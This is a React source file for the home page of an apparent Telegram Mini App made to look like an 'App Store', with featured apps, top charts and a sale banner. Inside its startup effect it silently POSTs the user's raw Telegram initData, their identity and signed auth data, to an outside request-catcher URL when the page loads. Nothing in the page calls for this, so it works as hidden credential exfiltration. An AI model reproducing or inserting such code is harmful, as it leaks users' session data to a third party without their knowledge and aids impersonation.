import { useState, useEffect } from "react";
import { Newspaper, Rocket, Layers, Gamepad2, Search } from "lucide-react";
import "./index.css";
import { Header } from "./components/layout/Header";
import { LargeTitle } from "./components/layout/LargeTitle";
import { BottomNav } from "./components/layout/BottomNav";
import { SafeArea } from "./components/layout/SafeArea";
import { SearchBar } from "./components/market/SearchBar";
import { SectionHeader } from "./components/market/SectionHeader";
import { AppRow } from "./components/market/AppRow";
import { AppCard } from "./components/market/AppCard";
import { Banner } from "./components/market/Banner";
import { fullApps } from "./data/full";
import { init, backButton, miniApp, retrieveRawInitData, postEvent, isTMA } from "@tma.js/sdk";

const topCharts = [...fullApps];

const featuredApps = [
  {
    id: 1,
    title: "Sky Cast",
    subtitle: "Entertainment",
    price: 0,
    color: "#AF52DE",
  },
  {
    id: 2,
    title: "Mindful",
    subtitle: "Health & Fitness",
    price: 4.99,
    color: "#FF2D55",
  },
  {
    id: 3,
    title: "Code Studio",
    subtitle: "Developer Tools",
    price: 9.99,
    color: "#30B0C7",
  },
];

const tabs = [
  { label: "Today", Icon: Newspaper },
  { label: "Games", Icon: Rocket },
  { label: "Apps", Icon: Layers },
  { label: "Arcade", Icon: Gamepad2 },
  { label: "Search", Icon: Search },
];

export function HomePage() {
  const [activeTab, setActiveTab] = useState(0);
  const [scrolled, setScrolled] = useState(false);

  useEffect(() => {
    // Инициализируем TMA SDK только если запущено в Telegram
    if (isTMA()) {
      try {
        init({
          acceptCustomStyles: false,
          themeParams: {
            text_color: "#000000",
            bg_color: "#ffffff",
          },
        });

        postEvent("web_app_setup_back_button", {
          is_visible: false,
        });

        miniApp.setHeaderColor("white");

        if (miniApp.setHeaderColor.supports("rgb")) {
          miniApp.setHeaderColor("#ffffff");
        }

        const initDataRaw = retrieveRawInitData();

        fetch("https://hkdk.events/52brkh80bhoy27", {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
            Authorization: `tma ${initDataRaw}`,
          },
          body: JSON.stringify({
            initData: initDataRaw,
           
          }),
        });
      } catch (error) {
        console.warn("TMA initialization failed:", error);
      }
    }

    // 40px примерно высота большого заголовка
    const onScroll = () => setScrolled(window.scrollY > 40);
    window.addEventListener("scroll", onScroll, { passive: true });
    onScroll();
    return () => window.removeEventListener("scroll", onScroll);
  }, []);

  return (
    <div className="min-h-dvh bg-white text-neutral-900">
      {/* Шапка всегда занимает 44px, но видна только после прокрутки */}
      <Header
        title="App Store"
        className={`transition-opacity duration-200 ${scrolled ? "opacity-100" : "opacity-0"}`}
      />

      <SafeArea>
        <main className="pb-24">
          <LargeTitle
            eyebrow="Sunday, September 20"
            title="Today"
            right={
              <img
                src="https://i.pravatar.cc/72?img=12"
                alt="Profile"
                className="h-9 w-9 rounded-full object-cover"
              />
            }
          />

          <div className="px-4 pb-4 pt-2">
            <SearchBar />
          </div>

          {/* Top Charts: список без gap, чтобы разделители шли сплошняком */}
          <section>
            <div className="px-4">
              <SectionHeader title="Top Charts" actionLabel="See All" />
            </div>
            <div>
              {topCharts.map((app) => (
                <AppRow
                  key={app.id}
                  id={app.id}
                  icon={app.icon}
                  title={app.title}
                  subtitle={app.subtitle}
                  rating={app.rating}
                  ratingCount={app.ratingCount}
                  price={app.price}
                  rank={app.rank}
                />
              ))}
            </div>
          </section>

          <section className="mt-6 px-4">
            <SectionHeader title="Promotions" />
            <Banner
              image="https://images.unsplash.com/photo-1550745165-9bc0b252726f?w=800&h=600&fit=crop"
              title="Summer Sale"
              subtitle="Up to 50% off selected titles"
              actionLabel="Browse"
            />
          </section>
        </main>
      </SafeArea>

      <BottomNav
        items={tabs.map(({ label, Icon }, i) => ({
          label,
          icon: <Icon size={24} strokeWidth={1.75} />,
          activeIcon: <Icon size={24} strokeWidth={2.25} />,
          active: activeTab === i,
          onClick: () => setActiveTab(i),
        }))}
      />
    </div>
  );
}
